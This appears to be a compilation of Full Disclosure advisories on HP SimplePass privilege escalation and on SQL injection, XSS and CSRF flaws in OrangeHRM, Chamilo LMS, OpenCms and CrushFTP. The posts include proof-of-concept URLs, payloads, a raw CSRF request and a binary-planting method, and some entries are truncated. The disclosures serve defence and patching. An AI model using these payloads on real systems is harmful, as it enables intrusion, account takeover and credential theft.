[FD] HP SimplePass Local Privilege Escalation
# Vulnerability Title: HP SimplePass Local Privilege Escalation # Advisory Release Date: 05/18/2017 # Credit: Discovered By Rehan Ahmed # Contact: knight_re...@hotmail.com # Severity Level: Medium # Type: Local # Tested Platform: Windows 8 & 10 x64 # Vendor: HP Inc. # Vendor Site: http://www.hp.com # Download Link: http://ftp.hp.com/pub/softpaq/sp64001-64500/sp64339.exe # Vulnerable Version: HP SimplePass 8.00.49, 8.00.57, 8.01.46 # Vendor Contacted: 04/03/2017 # Vendor Response: 5/18/2017 Summary: HP SimplePass allows you to safely store logon information for your favorite websites, and use a single method of authentication for your password-protected website accounts. Choose a fingerprint, password or PIN to authenticate your identity. Your computer must have at least one password-protected Windows User Account to use HP SimplePass. https://support.hp.com/us-en/document/c03653209 # Issue Details: # HP SimplePass is prone to a local privilege-escalation vulnerability due to insecure file system permissions that have been granted during installation. Local adversary can exploit this issue to gain elevated privileges on affected system. HP SimplePass installs by default to "C:\Program Files\Hewlett-Packard\SimplePass" with very weak folder permissions granting any user full permission to the contents of the directory and it's subfolders. This allows ample opportunity for code execution against any other user running the application. HP SimplePass has few binaries which are typically configured as a service or startup program which makes this particularly easy to take leverage. ## Proof of Concept ## a) C:\>icacls "C:\Program Files\Hewlett-Packard\SimplePass" C:\Program Files\Hewlett-Packard\SimplePass Everyone:(F) Everyone:(OI)(CI)(IO)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Administrators:(I)(OI)(CI)(IO)(F) NT AUTHORITY\SYSTEM:(I)(F) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F) NT AUTHORITY\Authenticated Users:(I)(M) NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M) BUILTIN\Users:(I)(RX) BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE) b) C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i "HP SimplePass" HP SimplePass Cachedrv Service Cachedrv server "C:\Program Files\Hewlett-Packard\SimplePass\cachesrvr.exe" Auto HP SimplePass Service omniserv C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe Auto A user can place a malicious DLL/EXE (e.g OmniServ.exe) file with one of the expected names into that directory and wait until the service is restarted. The service can not be restarted by normal users but an attacker could just reboot the system or wait for the next reboot to happen. ### 3) Mitigation: ### Change the permission for dirctory to group other than Administrator on Read/Execute. Fix: https://support.hp.com/us-en/drivers/selfservice/hp-envy-m7-n100-notebook-pc/8499292/model/8788306 ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] OrangeHRM Blind SQL Injection & XSS Vulnerabilities
I. Overview OrangeHRM (Opensource 3.2.1, Professional & Enterprise 4.11) are prone to a multiple Blind SQL injection & XSS vulnerabilities. These vulnerabilities allows an attacker to inject SQL commands to compromise the affected database management system in HRM, perform operations on behalf of affected victim, redirect them to malicious sites, steal their credentials, and more. II. Severity Rating: High Remote: Yes Authentication Require: Yes CVE-ID: III. Vendor's Description of Application OrangeHRM Solutions Effective HR tools and options to suit your needs Start-up, SME, global enterprises, whichever one you may be, OrangeHRM offers you flexibility and freedom to select from free and paid versions of OrangeHRM backed with specialized expertise. Our HR modules cover many major human capital management extents. OrangeHRM is used by millions of users around the world in all industries. Explore our solutions and contact our consultants to assist you with your selection process. http://www.orangehrm.com/ IV. Vulnerability Details & Exploit 1) Blind SQL Injection Request Method = GET a) /symfony/web/index.php/leave/getFilteredEmployeeCountAjax?location=-1)+or+(31337=31337)+and+(20=20&subunit=0 Request Method = POST b) /symfony/web/index.php/recruitment/viewCandidates sortField=[BSQLi] __ 2) Multiple Reflected XSS Request Method = GET a) /symfony/web/index.php/admin/saveJobTitle?jobTitleId=1';+confirm(0);+// Request Method = POST b) /symfony/web/index.php/performance/saveReview saveReview360Form[reviewId] = [XSS Payload] saveReview = [XSS Payload] VI. Affected Systems Software: OrangeHRM Version: OrangeHRM Opensource 3.2.1 or prior OrangeHRM Professional & Enterprise 4.11 or prior Solution (Fix): No VII. Vendor Response/Solution Vendor Contacted : 02/12/2015 Vendor Response : 02/12/2015 Shared Technical Details/Poc : 02/13/2015 Again Vendor Contacted : 03/04/2015 Vendor Response: No Response Advisory Release : 04/10/2015 VIII.Credits ======== Discovered by Rehan Ahmed knight_re...@hotmail.com ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Chamilo LMS 1.9.10 Multiple XSS & CSRF Vulnerabilities
=2&month_start=3&year_start=2015&end_limit=on&day_end=2&month_end=3&year_end=2016&session_visibility=2 CSRF PoC:- http://127.0.0.1/main/admin/session_add.php"; method="POST"> VI. Affected Systems Software: Chamilo LMS Version: 1.9.10 and Prior Solution (Fix): Upgrade to 1.9.11 (https://github.com/chamilo/chamilo-lms/) VII. Vendor Response/Solution ==== Vendor Contacted : 02/12/2015 Vendor Response : 02/12/2015 Patch Release: 03/17/2015 Advisory Release: 03/18/2015 VIII.Credits Discovered by Rehan Ahmed knight_re...@hotmail.com ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Alkacon OpenCms 9.5.1 Multiple XSS Vulnerabilities
Product: OpenCms Vendor: Alkacon Software Vulnerable Version(s): 9.5.1 and probably prior Tested Version: 9.5.1 Vendor Notification: Mar 05, 2015 (https://github.com/alkacon/opencms-core/issues/304) Vendor Patch: Not Yet (No Specific Time-line) Public Disclosure: Mar 12, 2015 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: Risk Level: Medium CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N) Solution Status: Not Yet (https://github.com/alkacon/opencms-core/) Discovered and Credits: Rehan Ahmed (knight_re...@hotmail.com) ___ Overview ___ Alkacon OpenCms 9.5.1 or prior versions are prone to a multiple cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. ___ Vendor's Description of Application ___ OpenCms from Alkacon Software is a professional, easy to use website content management system. OpenCms helps content managers worldwide to create and maintain beautiful websites fast and efficiently. The fully browser based user interface features configurable editors for structured content with well defined fields. Alternatively, content can be created using an integrated WYSIWYG editor similar to well known office applications. A sophisticated template engine enforces a site-wide corporate layout and W3C standard compliance for all content. OpenCms is based on Java and XML technology. It can be deployed in an open source environment (e.g. Linux, Apache, Tomcat, MySQL) as well as on commercial components (e.g. Windows NT, IIS, BEA Weblogic, Oracle). As true open source software, OpenCms is free of licensing costs. http://www.opencms.org/en/index.html ___ Vulnerability Details & Exploit ___ Method: GET /opencms/system/modules/org.opencms.workplace.help/jsptemplates/help_head.jsp?__locale=en&homelink="+onmouseover="javascript:confirm(0);">Click HERE
[FD] Crushftp 7.2.0 - Multiple CSRF & XSS Vulnerabilities
I. Overview Multiple CSRF & Cross-Site Scripting (XSS) vulnerabilities have been identified in Crushftp 7.2.0 (Web Interface) on default configuration. These vulnerabilities allows an attacker to gain control over valid user accounts, perform operations on their behalf, redirect them to malicious sites, steal their credentials, and more. II. Severity Rating: Medium Remote: Yes Authentication Require: Yes III. Vendor's Description of Application CrushFTP is a robust file transfer server that makes it easy to setup secure connections with your users. 'Crush' comes from the built-in zip methods in CrushFTP. They allow for downloading files in compressed formats in-stream, or even automatically expanding zip files as they are received in-stream. This is called ZipStreaming and can greatly accelerate the transfer of many types of files. Secure management is web based allowing you the ability to manage and monitor the server from anywhere, or with almost any device. Easy in place server upgrades without complicated installers. Runs as a daemon, or Windows service with no need for a local GUI. CrushFTP is watching out for you by detecting common hack attempts and robots which scan for weak passwords. It will automatically protect you against DDoS attacks. No need for you to do anything as CrushFTP will automatically ban these IPs to prevent wasted logging and CPU usage. This keeps your server secure from unwanted abuse. User management includes inheritance, groups, and virtual file systems. If you want simple user management, it can be as easy as just making a folder with a specific name and nothing else. Think about how easily you can delegate user administration with CrushFTP's role based administration and event configuration. http://www.crushftp.com/index.html IV. Vulnerability Details & Exploit 1) Multiple CSRF Vulnerabilities (Web Management interface - Default Config) a) An attacker may add/delete/modify user's accounts b) May change all configuration settings Request Method: POST Location: /WebInterface/fuction/ Proof of Concept:- 2) Multiple Cross-Site Scripting (Web Interface - Default Config) Type: Reflected Request Method: POST Location: /WebInterface/function/ Parameter: vfs_items Values: vfs_items = Proof of Concept: POST /WebInterface/function/ HTTP/1.1 Host: 127.0.0.1:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://127.0.0.1:8080/WebInterface/UserManager/index.html Content-Length: 656 Cookie: X Connection: keep-alive Pragma: no-cache Cache-Control: no-cache command=setUserItem&data_action=new&serverGroup=MainUsers&username=test&user=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%3Cuser+type%3D%22properties%22%3E%3Cusername%3Etest2%3C%2Fusername%3E%3Cpassword%3Etest2%3C%2Fpassword%3E%3Cmax_logins%3E0%3C%2Fmax_logins%3E%3Croot_dir%3E%2F%3C%2Froot_dir%3E%3C%2Fuser%3E&xmlItem=user&vfs_items=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%3Cvfs+type%3D%22properties%22%3E%3C%2Fvfs%3E&permissions=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%3Cpermissions+type%3D%22properties%22%3E%3Citem+name%3D%22%2F%22%3E(read)(view)(resume)%3C%2Fitem%3E%3C%2Fpermissions%3E Type: Reflected Request Method: GET Location: /WebInterface/function/ Parameter: path Values: ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
